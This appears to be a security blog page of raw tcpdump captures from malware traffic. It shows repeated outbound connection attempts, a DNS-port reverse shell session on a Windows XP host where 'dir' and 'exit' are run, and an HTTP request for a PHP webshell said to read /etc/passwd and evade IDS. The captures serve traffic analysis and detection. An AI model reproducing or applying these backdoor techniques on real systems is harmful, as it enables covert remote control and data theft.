2015-05-19 23:00:41.094465 IP 192.168.1.101.41967 > 193.0.200.131.35689: Flags [S], seq 2151446048, win 65535, options [mss 1460,nop,nop,sackOK], length 0
E..0^.@…P….e…….i.<v ….p……………
2015-05-19 23:00:55.094954 IP 192.168.1.101.41971 > 193.0.200.131.35689: Flags [S], seq 3563735941, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4_.@…O….e…….i.jK……….7…………..
2015-05-19 23:00:58.093473 IP 192.168.1.101.41971 > 193.0.200.131.35689: Flags [S], seq 3563735941, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4`k@…N….e…….i.jK……….7…………..
2015-05-19 23:01:04.095993 IP 192.168.1.101.41971 > 193.0.200.131.35689: Flags [S], seq 3563735941, win 65535, options [mss 1460,nop,nop,sackOK], length 0
E..0b}@…L….e…….i.jK…..p….@……….
2015-05-19 23:01:18.095228 IP 192.168.1.101.41998 > 193.0.200.131.35689: Flags [S], seq 2707094062, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4d.@…JA…e…….i.Z……….X……………
2015-05-19 23:01:21.093621 IP 192.168.1.101.41998 > 193.0.200.131.35689: Flags [S], seq 2707094062, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4e.@…I|…e…….i.Z……….X……………
2015-05-19 23:01:27.098049 IP 192.168.1.101.41998 > 193.0.200.131.35689: Flags [S], seq 2707094062, win 65535, options [mss 1460,nop,nop,sackOK], length 0
E..0gQ@…G….e…….i.Z……p…l………..
2015-05-19 23:01:41.099272 IP 192.168.1.101.42025 > 193.0.200.131.35689: Flags [S], seq 2645781356, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4h.@…F[…e…..).i..kl……………………
2015-05-19 23:01:44.099687 IP 192.168.1.101.42025 > 193.0.200.131.35689: Flags [S], seq 2645781356, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4i,@…F….e…..).i..kl……………………
2015-05-19 23:01:50.098133 IP 192.168.1.101.42025 > 193.0.200.131.35689: Flags [S], seq 2645781356, win 65535, options [mss 1460,nop,nop,sackOK], length 0
E..0ix@…E….e…..).i..kl….p……………
2015-05-19 23:02:04.104657 IP 192.168.1.101.42029 > 193.0.200.131.35689: Flags [S], seq 2325464383, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4i.@…Ev…e…..-.i…?……………………
2015-05-19 23:02:07.119976 IP 192.168.1.101.42029 > 193.0.200.131.35689: Flags [S], seq 2325464383, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4i.@…E^…e…..-.i…?……………………
2015-05-19 23:02:13.117210 IP 192.168.1.101.42029 > 193.0.200.131.35689: Flags [S], seq 2325464383, win 65535, options [mss 1460,nop,nop,sackOK], length 0
E..0i.@…EH…e…..-.i…?….p……………
2015-05-19 23:02:27.128453 IP 192.168.1.101.42030 > 193.0.200.131.35689: Flags [S], seq 3243784780, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4j.@…E….e…….i.X:L………G…………..
2015-05-19 23:02:30.135843 IP 192.168.1.101.42030 > 193.0.200.131.35689: Flags [S], seq 3243784780, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4j”@…E….e…….i.X:L………G…………..
2015-05-19 23:02:36.145058 IP 192.168.1.101.42030 > 193.0.200.131.35689: Flags [S], seq 3243784780, win 65535, options [mss 1460,nop,nop,sackOK], length 0
E..0j@@…D….e…….i.X:L….p….Q……….
2015-05-19 23:02:50.141196 IP 192.168.1.101.42033 > 193.0.200.131.35689: Flags [S], seq 234299550, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4jj@…D….e…..1.i.. ……….T…………..
2015-05-19 23:02:53.142717 IP 192.168.1.101.42033 > 193.0.200.131.35689: Flags [S], seq 234299550, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4j.@…D….e…..1.i.. ……….T…………..
2015-05-19 23:02:59.142926 IP 192.168.1.101.42033 > 193.0.200.131.35689: Flags [S], seq 234299550, win 65535, options [mss 1460,nop,nop,sackOK], length 0
E..0j.@…D{…e…..1.i.. …..p….]……….
2015-05-19 23:03:13.147235 IP 192.168.1.101.42034 > 193.0.200.131.35689: Flags [S], seq 2811646036, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4j.@…D^…e…..2.i..PT……………………
2015-05-19 23:03:16.153598 IP 192.168.1.101.42034 > 193.0.200.131.35689: Flags [S], seq 2811646036, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4j.@…DX…e…..2.i..PT……………………
2015-05-19 23:03:22.165817 IP 192.168.1.101.42034 > 193.0.200.131.35689: Flags [S], seq 2811646036, win 65535, options [mss 1460,nop,nop,sackOK], length 0
E..0j.@…DU…e…..2.i..PT….p……………
2015-05-19 23:03:36.174000 IP 192.168.1.101.42036 > 193.0.200.131.35689: Flags [S], seq 3352231349, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4k @…D)…e…..4.i………….b…………..
2015-05-19 23:03:39.174474 IP 192.168.1.101.42036 > 193.0.200.131.35689: Flags [S], seq 3352231349, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4k%@…D….e…..4.i………….b…………..
2015-05-19 23:03:45.178704 IP 192.168.1.101.42036 > 193.0.200.131.35689: Flags [S], seq 3352231349, win 65535, options [mss 1460,nop,nop,sackOK], length 0
E..0k1@…D….e…..4.i……..p…Bk……….
2015-05-19 23:03:59.186950 IP 192.168.1.101.42037 > 193.0.200.131.35689: Flags [S], seq 647074179, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4kL@…C….e…..5.i&………..;……………
2015-05-19 23:04:02.188369 IP 192.168.1.101.42037 > 193.0.200.131.35689: Flags [S], seq 647074179, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4kX@…C….e…..5.i&………..;……………
2015-05-19 23:04:08.180587 IP 192.168.1.101.42037 > 193.0.200.131.35689: Flags [S], seq 647074179, win 65535, options [mss 1460,nop,nop,sackOK], length 0

Weird DNS Malware NS Based Reverse Command Line Shell Backdoor Trojan

| | No comments yet | Tags:

2005-01-13 21:50:16.484263 ARP, Request who-has 192.168.1.1 tell 192.168.1.3, length 46
……….5x…………………………….
2005-01-13 21:50:16.501471 IP 192.168.1.3.1393 > 192.168.1.1.53: 1+ PTR? 1.1.168.192.in-addr.arpa. (42)
E..F…….K………q.5.2……………1.1.168.192.in-addr.arpa…..
2005-01-13 21:50:16.501497 ARP, Reply 192.168.1.1 is-at 00:90:d0:eb:46:e7, length 28
…………F…….5x……
2005-01-13 21:50:16.504144 IP 192.168.1.1.53 > 192.168.1.3.1393: 1* 1/0/0 PTR SpeedTouch.lan. (70)
E..b …@…………5.q.N……………1.1.168.192.in-addr.arpa……………..
SpeedTouch.lan.
2005-01-13 21:50:16.580303 00:0e:35:78:0c:02 > ff:ff:ff:ff:ff:ff, ethertype Unknown (0x2452), length 82:
0x0000: 0842 0000 ffff ffff ffff 0010 c630 6bb3 .B………..0k.
0x0010: 000e 3578 0c02 a07f 5fd2 1700 aaaa 0300 ..5x…._…….
0x0020: 0000 0806 0001 0800 0604 0001 000e 3578 …………..5x
0x0030: 0c02 c0a8 0103 0000 0000 0000 c0a8 0101 …………….
0x0040: 202a 4a8e .*J.
.B………..0k…5x…._…………………5x……………. *J.
2005-01-13 21:50:17.600303 00:90:d0:eb:46:e7 > 00:10:c6:30:6b:b3, ethertype Unknown (0x2452), length 96:
0x0000: 0841 0201 0010 c630 6bb3 0080 4824 3332 .A…..0k…H$32
0x0010: 0090 d0eb 46e7 9001 6615 8300 aaaa 0300 ….F…f…….
0x0020: 0000 0800 4500 002a 07b8 4000 4006 e73d ….E..*..@.@..=
0x0030: c0a8 0102 8c70 fdbd 0402 584c 5329 354d …..p….XLS)5M
0x0040: 51b9 b5af 5018 f904 f6f8 0000 87c6 a2af Q…P………..
0x0050: 538a S.
.A…..0k…H$32….F…f………..E..*..@.@..=…..p….XLS)5MQ…P………..S.
2005-01-13 21:50:19.113417 IP 192.168.1.3.1394 > 192.168.1.1.53: 2+ A? www.www.com.lan. (33)
E..=…….S………r.5.)……………www.www.com.lan…..
2005-01-13 21:50:19.131199 IP 192.168.1.1.53 > 192.168.1.3.1394: 2 0/0/0 (33)
E..= …@…………5.r.)%…………..www.www.com.lan…..
2005-01-13 21:50:19.132818 IP 192.168.1.3.1395 > 192.168.1.1.53: 3+ A? www.www.com. (29)
E..9. …..V………s.5.%
…………..www.www.com…..
2005-01-13 21:50:19.442482 IP 192.168.1.1.53 > 192.168.1.3.1395: 3 1/0/0 A 63.215.91.200 (45)
E..I …@…………5.s.5……………www.www.com……………..?.[.
2005-01-13 21:50:41.962974 ARP, Request who-has 192.168.1.2 tell 192.168.1.3, length 46
……….5x…………………………….
2005-01-13 21:50:41.975819 00:0e:35:78:0c:02 > ff:ff:ff:ff:ff:ff, ethertype Unknown (0x2452), length 82:
0x0000: 0842 0000 ffff ffff ffff 0010 c630 6bb3 .B………..0k.
0x0010: 000e 3578 0c02 6090 71d2 1700 aaaa 0300 ..5x..`.q…….
0x0020: 0000 0806 0001 0800 0604 0001 000e 3578 …………..5x
0x0030: 0c02 c0a8 0103 0000 0000 0000 c0a8 0102 …………….
0x0040: 9a7b 4317 .{C.
.B………..0k…5x..`.q…………………5x……………..{C.
2005-01-13 21:50:41.976748 00:0e:35:78:0c:02 > 00:10:c6:30:6b:b3, ethertype Unknown (0x2452), length 82:
0x0000: 0841 0201 0010 c630 6bb3 0080 4824 3332 .A…..0k…H$32
0x0010: 000e 3578 0c02 6003 e408 f700 aaaa 0300 ..5x..`………
0x0020: 0000 0806 0001 0800 0604 0002 0080 4824 …………..H$
0x0030: 3332 c0a8 0102 000e 3578 0c02 c0a8 0103 32……5x……
0x0040: 461f 4b55 F.KU
.A…..0k…H$32..5x..`…………………..H$32……5x……F.KU
2005-01-13 21:50:41.977621 IP 192.168.1.3.1396 > 192.168.1.2.53: Flags [S], seq 600126399, win 16384, options [mss 1460,nop,nop,sackOK], length 0
E..0.
@…bh………t.5#.3…..p.@.b………..
2005-01-13 21:50:41.977640 ARP, Reply 192.168.1.2 is-at 00:80:48:24:33:32, length 28
……….H$32……5x……
2005-01-13 21:50:41.979157 00:0e:35:78:0c:02 > 00:80:48:24:33:32, ethertype Unknown (0x2452), length 102:
0x0000: 0842 0201 0080 4824 3332 0010 c630 6bb3 .B….H$32…0k.
0x0010: 000e 3578 0c02 8090 73d2 1700 aaaa 0300 ..5x….s…….
0x0020: 0000 0800 4500 0030 150a 4000 8006 6268 ….E..0..@…bh
0x0030: c0a8 0103 c0a8 0102 0574 0035 23c5 33bf ………t.5#.3.
0x0040: 0000 0000 7002 4000 629c 0000 0204 05b4 ….p.@.b…….
0x0050: 0101 0402 60ba 5f93 ….`._.
.B….H$32…0k…5x….s………..E..0.
@…bh………t.5#.3…..p.@.b………..`._.
2005-01-13 21:50:41.980806 00:0e:35:78:0c:02 > 00:10:c6:30:6b:b3, ethertype Unknown (0x2452), length 102:
0x0000: 0841 0201 0010 c630 6bb3 0080 4824 3332 .A…..0k…H$32
0x0010: 000e 3578 0c02 7003 b218 f700 aaaa 0300 ..5x..p………
0x0020: 0000 0800 4500 0030 07cc 4000 4006 afa6 ….E..0..@.@…
0x0030: c0a8 0102 c0a8 0103 0035 0574 bd0f 2fec ………5.t../.
0x0040: 23c5 33c0 7012 ffff b597 0000 0204 05ac #.3.p………..
0x0050: 0101 0402 cda6 8698 ……..
2005-01-13 21:50:41.983172 00:0e:35:78:0c:02 > 00:80:48:24:33:32, ethertype Unknown (0x2452), length 94:
0x0000: 0842 0201 0080 4824 3332 0010 c630 6bb3 .B….H$32…0k.
0x0010: 000e 3578 0c02 a090 75d2 1700 aaaa 0300 ..5x….u…….
0x0020: 0000 0800 4500 0028 150b 4000 8006 626f ….E..(..@…bo
0x0030: c0a8 0103 c0a8 0102 0574 0035 23c5 33c0 ………t.5#.3.
0x0040: bd0f 2fed 5010 4410 9e43 0000 92b4 4166 ../.P.D..C….Af
.B….H$32…0k…5x….u………..E..(..@…bo………t.5#.3…/.P.D..C….Af
2005-01-13 21:50:42.039309 00:0e:35:78:0c:02 > 00:10:c6:30:6b:b3, ethertype Unknown (0x2452), length 182:
0x0000: 0841 0201 0010 c630 6bb3 0080 4824 3332 .A…..0k…H$32
0x0010: 000e 3578 0c02 8003 dafc f700 aaaa 0300 ..5x…………
0x0020: 0000 0800 4500 0080 07cd 4000 4006 af55 ….E…..@.@..U
0x0030: c0a8 0102 c0a8 0103 0035 0574 bd0f 2fed ………5.t../.
0x0040: 23c5 33c0 5018 ffff 4e14 0000 4d69 6372 #.3.P…N…Micr
0x0050: 6f73 6f66 7420 5769 6e64 6f77 7320 5850 osoft.Windows.XP
0x0060: 205b 5665 7273 696f 6e20 352e 312e 3236 .[Version.5.1.26
0x0070: 3030 5d0d 0a28 4329 2043 6f70 7972 6967 00]..(C).Copyrig
0x0080: 6874 2031 3938 352d 3230 3031 204d 6963 ht.1985-2001.Mic
0x0090: 726f 736f 6674 2043 6f72 702e 0d0a 0d0a rosoft.Corp…..
0x00a0: 433a 5c3e 611e 6bb9 C:\>a.k.
.A…..0k…H$32..5x…………….E…..@.@..U………5.t../.#.3.P…N…Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\>a.k.
2005-01-13 21:50:42.040365 IP 192.168.1.2.53 > 192.168.1.3.1396: Flags [P.], seq 1:89, ack 1, win 65535, length 8825458 updateMA+% [b2&3=0x6f73] [29728a] [28518q] [22377n] [28260au][|domain]
E…..@.@..U………5.t../.#.3.P…N…Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\>
2005-01-13 21:50:42.182595 IP 192.168.1.3.1396 > 192.168.1.2.53: Flags [.], ack 89, win 17336, length 0
E..(..@…bn………t.5#.3…0EP.C..C……..
2005-01-13 21:50:42.200502 00:0e:35:78:0c:02 > 00:80:48:24:33:32, ethertype Unknown (0x2452), length 94:
0x0000: 0842 0201 0080 4824 3332 0010 c630 6bb3 .B….H$32…0k.
0x0010: 000e 3578 0c02 e090 77d2 1700 aaaa 0300 ..5x….w…….
0x0020: 0000 0800 4500 0028 150c 4000 8006 626e ….E..(..@…bn
0x0030: c0a8 0103 c0a8 0102 0574 0035 23c5 33c0 ………t.5#.3.
0x0040: bd0f 3045 5010 43b8 9e43 0000 731e 84d2 ..0EP.C..C..s…
.B….H$32…0k…5x….w………..E..(..@…bn………t.5#.3…0EP.C..C..s…
2005-01-13 21:50:44.334418 IP 192.168.1.3.1396 > 192.168.1.2.53: Flags [P.], seq 1:5, ack 89, win 17336, length 4[|domain]
E..,..@…bi………t.5#.3…0EP.C…..dir
..
2005-01-13 21:50:44.351385 00:0e:35:78:0c:02 > 00:80:48:24:33:32, ethertype Unknown (0x2452), length 98:
0x0000: 0842 0201 0080 4824 3332 0010 c630 6bb3 .B….H$32…0k.
0x0010: 000e 3578 0c02 4092 78d2 1700 aaaa 0300 ..5x..@.x…….
0x0020: 0000 0800 4500 002c 150d 4000 8006 6269 ….E..,..@…bi
0x0030: c0a8 0103 c0a8 0102 0574 0035 23c5 33c0 ………t.5#.3.
0x0040: bd0f 3045 5018 43b8 c7c3 0000 6469 720a ..0EP.C…..dir.
0x0050: 1e86 8ed7 ….
.B….H$32…0k…5x..@.x………..E..,..@…bi………t.5#.3…0EP.C…..dir
2005-01-13 21:50:44.369608 00:0e:35:78:0c:02 > 00:10:c6:30:6b:b3, ethertype Unknown (0x2452), length 295:
0x0000: 0841 0201 0010 c630 6bb3 0080 4824 3332 .A…..0k…H$32
0x0010: 000e 3578 0c02 9003 368b 1b00 aaaa 0300 ..5x….6…….
0x0020: 0000 0800 4500 00f1 07ce 4000 4006 aee3 ….E…..@.@…
0x0030: c0a8 0102 c0a8 0103 0035 0574 bd0f 3045 ………5.t..0E
0x0040: 23c5 33c4 5018 fffb 4f3b 0000 6469 720d #.3.P…O;..dir.
0x0050: 0a20 566f 6c75 6d65 2069 6e20 6472 6976 ..Volume.in.driv
0x0060: 6520 4320 6861 7320 6e6f 206c 6162 656c e.C.has.no.label
0x0070: 2e0d 0a20 566f 6c75 6d65 2053 6572 6961 ….Volume.Seria
0x0080: 6c20 4e75 6d62 6572 2069 7320 4646 3437 l.Number.is.FF47
0x0090: 2d38 3045 420d 0a0d 0a20 4469 7265 6374 -80EB…..Direct
0x00a0: 6f72 7920 6f66 2043 3a5c 0d0a 0d0a 3031 ory.of.C:\….01
0x00b0: 2f31 322f 3230 3035 2020 3131 3a35 3920 /12/2005..11:59.
0x00c0: 414d 2020 2020 2020 2020 2020 2020 2020 AM…………..
0x00d0: 2020 2030 2061 6965 7272 6f72 6c6f 672e …0.aierrorlog.
0x00e0: 7478 740d 0a30 312f 3139 2f32 3030 3420 txt..01/19/2004.
0x00f0: 2030 393a 3435 2050 4d20 2020 2020 2020 .09:45.PM…….
0x0100: 2020 2020 2020 2020 2020 3020 4155 544f ……….0.AUTO
0x0110: 4558 4543 2e35 1c73 2c EXEC.5.s,
.A…..0k…H$32..5x….6………..E…..@.@…………5.t..0E#.3.P…O;..dir
Volume in drive C has no label.
Volume Serial Number is FF47-80EB

Directory of C:\

01/12/2005 11:59 AM 0 aierrorlog.txt
01/19/2004 09:45 PM 0 AUTOEXEC.5.s,
2005-01-13 21:50:44.370919 IP 192.168.1.2.53 > 192.168.1.3.1396: Flags [P.], seq 89:290, ack 5, win 65531, length 20129197 inv_q [b2&3=0xa20] [22127q] [27765a] [28005n] [8297au][|domain]
E…..@.@…………5.t..0E#.3.P…O;..dir
Volume in drive C has no label.
Volume Serial Number is FF47-80EB

Directory of C:\

01/12/2005 11:59 AM 0 aierrorlog.txt
01/19/2004 09:45 PM 0 AUTOEXEC.
2005-01-13 21:50:44.485905 IP 192.168.1.3.1396 > 192.168.1.2.53: Flags [.], ack 290, win 17135, length 0
E..(..@…bl………t.5#.3…1.P.B..?……..
2005-01-13 21:50:44.502308 00:0e:35:78:0c:02 > 00:80:48:24:33:32, ethertype Unknown (0x2452), length 94:
0x0000: 0842 0201 0080 4824 3332 0010 c630 6bb3 .B….H$32…0k.
0x0010: 000e 3578 0c02 7092 7ad2 1700 aaaa 0300 ..5x..p.z…….
0x0020: 0000 0800 4500 0028 150e 4000 8006 626c ….E..(..@…bl
0x0030: c0a8 0103 c0a8 0102 0574 0035 23c5 33c4 ………t.5#.3.
0x0040: bd0f 310e 5010 42ef 9e3f 0000 d248 fe3f ..1.P.B..?…H.?
.B….H$32…0k…5x..p.z………..E..(..@…bl………t.5#.3…1.P.B..?…H.?
2005-01-13 21:50:44.505662 00:0e:35:78:0c:02 > 00:10:c6:30:6b:b3, ethertype Unknown (0x2452), length 1105:
0x0000: 0841 0201 0010 c630 6bb3 0080 4824 3332 .A…..0k…H$32
0x0010: 000e 3578 0c02 a003 289c 1d00 aaaa 0300 ..5x….(…….
0x0020: 0000 0800 4500 041b 07cf 4000 4006 abb8 ….E…..@.@…
0x0030: c0a8 0102 c0a8 0103 0035 0574 bd0f 310e ………5.t..1.
0x0040: 23c5 33c4 5018 fffb 1d45 0000 4241 540d #.3.P….E..BAT.
0x0050: 0a30 312f 3139 2f32 3030 3420 2030 393a .01/19/2004..09:
0x0060: 3435 2050 4d20 2020 2020 2020 2020 2020 45.PM………..
0x0070: 2020 2020 2020 3020 434f 4e46 4947 2e53 ……0.CONFIG.S
0x0080: 5953 0d0a 3036 2f32 362f 3230 3034 2020 YS..06/26/2004..
0x0090: 3132 3a31 3220 504d 2020 2020 3c44 4952 12:12.PM….<DIR
0x00a0: 3e20 2020 2020 2020 2020 2044 6f63 756d >……….Docum
0x00b0: 656e 7473 2061 6e64 2053 6574 7469 6e67 ents.and.Setting
0x00c0: 730d 0a30 322f 3033 2f32 3030 3520 2031 s..02/03/2005..1
0x00d0: 313a 3430 2050 4d20 2020 203c 4449 523e 1:40.PM….<DIR>
0x00e0: 2020 2020 2020 2020 2020 4561 7379 426f ……….EasyBo
0x00f0: 6f74 0d0a 3032 2f32 392f 3230 3034 2020 ot..02/29/2004..
0x0100: 3032 3a35 3120 504d 2020 2020 2020 2020 02:51.PM……..
0x0110: 2020 2020 3131 2c35 3331 2069 6e73 7461 ….11,531.insta
0x0120: 6c6c 6572 2d64 6562 7567 2e74 7874 0d0a ller-debug.txt..
0x0130: 3132 2f31 392f 3230 3034 2020 3132 3a35 12/19/2004..12:5
0x0140: 3020 414d 2020 2020 3c44 4952 3e20 2020 0.AM….<DIR>…
0x0150: 2020 2020 2020 206d 6761 0d0a 3132 2f31 …….mga..12/1
0x0160: 392f 3230 3034 2020 3132 3a35 3120 414d 9/2004..12:51.AM
0x0170: 2020 2020 3c44 4952 3e20 2020 2020 2020 ….<DIR>…….
0x0440: 73ac 58 s.X
.A…..0k…H$32..5x….(………..E…..@.@…………5.t..1.#.3.P….E..BAT
01/19/2004 09:45 PM 0 CONFIG.SYS
06/26/2004 12:12 PM <DIR> Documents and Settings
02/03/2005 11:40 PM <DIR> EasyBoot
02/29/2004 02:51 PM 11,531 installer-debug.txt
12/19/2004 12:50 AM <DIR> mga
12/19/2004 12:51 AM <DIR> mgafold
11/24/2004 07:47 PM <DIR> mnt
10/07/2004 10:01 AM <DIR> movie
06/26/2004 01:03 PM <DIR> My Downloads
01/13/2005 10:52 PM <DIR> Program Files
01/04/2005 10:27 AM <DIR> quarantine
04/19/2004 09:57 PM 7,241 s37g
10/31/2004 08:36 PM 0 s3fs
06/02/2004 08:54 PM 123 systemscandata.txt
08/08/2004 10:48 AM <DIR> Temp
12/12/2004 02:24 PM 94,135,944 temp.mpg
01/13/2005 06:10 PM <DIR> WINDOWS
11/20/2004 09:27 AM <DIR> WUTemp
8 File(s) 94,154,839 bytes
12 Dir(s) 7,145,897,984 bytes free

C:\>.s.X
2005-01-13 21:50:44.508420 IP 192.168.1.2.53 > 192.168.1.3.1396: Flags [P.], seq 290:1301, ack 5, win 65531, length 101121517 inv_q% [b2&3=0xa30] [12591q] [12601a] [12082n] [12336au][|domain]
E…..@.@…………5.t..1.#.3.P….E..BAT
01/19/2004 09:45 PM 0 CONFIG.SYS
06/26/2004 12:12 PM <DIR> Documents and Settings
02/03/2005 11:40 PM <DIR> EasyBoot
02/29/2004 02:51 PM 11,531 installer-debug.txt
12/19/2004 12:50 AM <DIR> mga
12/19/2004 12:51 AM <DIR> mgafold
11/24/2004 07:47 PM <DIR> mnt
10/07/2004 10:01 AM <DIR> movie
06/26/2004 01:03 PM <DIR> My Downloads
01/13/2005 10:52 PM <DIR> Program Files
01/04/2005 10:27 AM <DIR> quarantine
04/19/2004 09:57 PM 7,241 s37g
10/31/2004 08:36 PM 0 s3fs
06/02/2004 08:54 PM 123 systemscandata.txt
08/08/2004 10:48 AM <DIR> Temp
12/12/2004 02:24 PM 94,135,944 temp.mpg
01/13/2005 06:10 PM <DIR> WINDOWS
11/20/2004 09:27 AM <DIR> WUTemp
8 File(s) 94,154,839 bytes
12 Dir(s) 7,145,897,984 bytes free

C:\>
2005-01-13 21:50:44.686211 IP 192.168.1.3.1396 > 192.168.1.2.53: Flags [.], ack 1301, win 16124, length 0
E..(..@…bk………t.5#.3…5.P.>..?……..
2005-01-13 21:50:44.702807 00:0e:35:78:0c:02 > 00:80:48:24:33:32, ethertype Unknown (0x2452), length 94:
0x0000: 0842 0201 0080 4824 3332 0010 c630 6bb3 .B….H$32…0k.
0x0010: 000e 3578 0c02 b092 7cd2 1700 aaaa 0300 ..5x….|…….
0x0020: 0000 0800 4500 0028 150f 4000 8006 626b ….E..(..@…bk
0x0030: c0a8 0103 c0a8 0102 0574 0035 23c5 33c4 ………t.5#.3.
0x0040: bd0f 3501 5010 3efc 9e3f 0000 e419 f48f ..5.P.>..?……
.B….H$32…0k…5x….|………..E..(..@…bk………t.5#.3…5.P.>..?……
2005-01-13 21:50:47.268247 IP 192.168.1.3.1396 > 192.168.1.2.53: Flags [P.], seq 5:10, ack 1301, win 16124, length 5[|domain]
E..-..@…be………t.5#.3…5.P.>..E..exit
.
2005-01-13 21:50:47.284740 00:0e:35:78:0c:02 > 00:80:48:24:33:32, ethertype Unknown (0x2452), length 99:
0x0000: 0842 0201 0080 4824 3332 0010 c630 6bb3 .B….H$32…0k.
0x0010: 000e 3578 0c02 7094 7dd2 1700 aaaa 0300 ..5x..p.}…….
0x0020: 0000 0800 4500 002d 1510 4000 8006 6265 ….E..-..@…be
0x0030: c0a8 0103 c0a8 0102 0574 0035 23c5 33c4 ………t.5#.3.
0x0040: bd0f 3501 5018 3efc c545 0000 6578 6974 ..5.P.>..E..exit
0x0050: 0a19 a578 f8 …x.
.B….H$32…0k…5x..p.}………..E..-..@…be………t.5#.3…5.P.>..E..exit
..x.

AJAX php Webshell Backdoor Trojan Sample PCAP Traffic Output

| | No comments yet | Tags:

Interesting, you don’t see the /etc/passwd file or any other file requested by the webshell, it outputs into a form box within the shell making it hard for IDS detection.

The detection ratio for this php backdoor is less then 10%

2015-02-11 18:04:35.260009 IP 192.168.1.104.62053 > 192.168.1.100.80: Flags [S], seq 3604892541, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4IQ@….V…h…d.e.P..K}…… ……………..
2015-02-11 18:04:35.260065 IP 192.168.1.100.80 > 192.168.1.104.62053: Flags [S.], seq 3883739444, ack 3604892542, win 29200, options [mss 1460,nop,nop,sackOK,nop,wscale 7], length 0
E..4..@.@……d…h.P.e.})4..K~..r..C…………..
2015-02-11 18:04:35.264540 IP 192.168.1.104.62053 > 192.168.1.100.80: Flags [.], ack 1, win 64, length 0
E..(IR@….a…h…d.e.P..K~.})5P..@……….
2015-02-11 18:04:35.264579 IP 192.168.1.104.62053 > 192.168.1.100.80: Flags [P.], seq 1:453, ack 1, win 64, length 452
E…IS@…,….h…d.e.P..K~.})5P..@.#..GET /shells/ajaxphp.php HTTP/1.1
Host: 192.168.1.100
Connection: keep-alive
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.111 Safari/537.36
Accept-Encoding: gzip, deflate, sdch
Accept-Language: en-US,en;q=0.8
Cookie: PHPSESSID=dn3b2pg86rn1m990dibrngk463
AlexaToolbar-ALX_NS_PH: AlexaToolbar/alxg-3.3
2015-02-11 18:04:35.264614 IP 192.168.1.100.80 > 192.168.1.104.62053: Flags [.], ack 453, win 237, length 0
E..(.S@.@.._…d…h.P.e.})5..MBP….7..
2015-02-11 18:04:35.267945 IP 192.168.1.100.80 > 192.168.1.104.62053: Flags [P.], seq 1:754, ack 453, win 237, length 753
E….T@.@..m…d…h.P.e.})5..MBP….(..HTTP/1.1 200 OK
Date: Wed, 11 Feb 2015 22:04:35 GMT
Server: Apache/2.4.10 (Ubuntu)
X-Powered-By: PHP/5.5.12-2ubuntu4.1
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 342
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html

……….uQ.j. .}.WH`t….M.a|..`..e…o.K…………A…s..
..M.ae..T…0B…1…;.”..3kE-.Np….Jw.UF(Y….M…u`……’.R#b..T…..#!.Q…`b……….b._H\R”d?.d~z(…I……~.#….fJ8B…..D6b<e….Pi…….’vf..(W…w.\.0p…1N. .g..a>a.’.S….>u..3O.v…J……..@..:..W..Wv\R.>^.yMv..Z.a…..Dy0o…….m..d..C~…uHa.@b..t…..*….
2015-02-11 18:04:35.323244 IP 192.168.1.104.62053 > 192.168.1.100.80: Flags [.], ack 754, win 61, length 0
E..(IT@…._…h…d.e.P..MB.},&P..=……….
2015-02-11 18:04:40.273129 IP 192.168.1.100.80 > 192.168.1.104.62053: Flags [F.], seq 754, ack 453, win 237, length 0
E..(.U@.@..]…d…h.P.e.},&..MBP….7..
2015-02-11 18:04:40.337269 IP 192.168.1.104.62053 > 192.168.1.100.80: Flags [.], ack 755, win 61, length 0
E..(IU@….^…h…d.e.P..MB.},’P..=……….
2015-02-11 18:04:42.694786 IP 192.168.1.104.62053 > 192.168.1.100.80: Flags [F.], seq 453, ack 755, win 61, length 0
E..(IV@….]…h…d.e.P..MB.},’P..=……….
2015-02-11 18:04:42.694838 IP 192.168.1.100.80 > 192.168.1.104.62053: Flags [.], ack 454, win 237, length 0
E..(7.@.@……d…h.P.e.},’..MCP….N..
2015-02-11 18:04:42.694850 IP 192.168.1.104.62057 > 192.168.1.100.80: Flags [S], seq 241198115, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4IW@….P…h…d.i.P.`d#…… .e……………
2015-02-11 18:04:42.694871 IP 192.168.1.100.80 > 192.168.1.104.62057: Flags [S.], seq 4062599801, ack 241198116, win 29200, options [mss 1460,nop,nop,sackOK,nop,wscale 7], length 0
E..4..@.@……d…h.P.i.&Zy.`d$..r..C…………..
2015-02-11 18:04:42.701551 IP 192.168.1.104.62057 > 192.168.1.100.80: Flags [.], ack 1, win 64, length 0
E..(IX@….[…h…d.i.P.`d$.&ZzP..@y………
2015-02-11 18:04:42.701754 IP 192.168.1.104.62057 > 192.168.1.100.80: Flags [P.], seq 1:640, ack 1, win 64, length 639
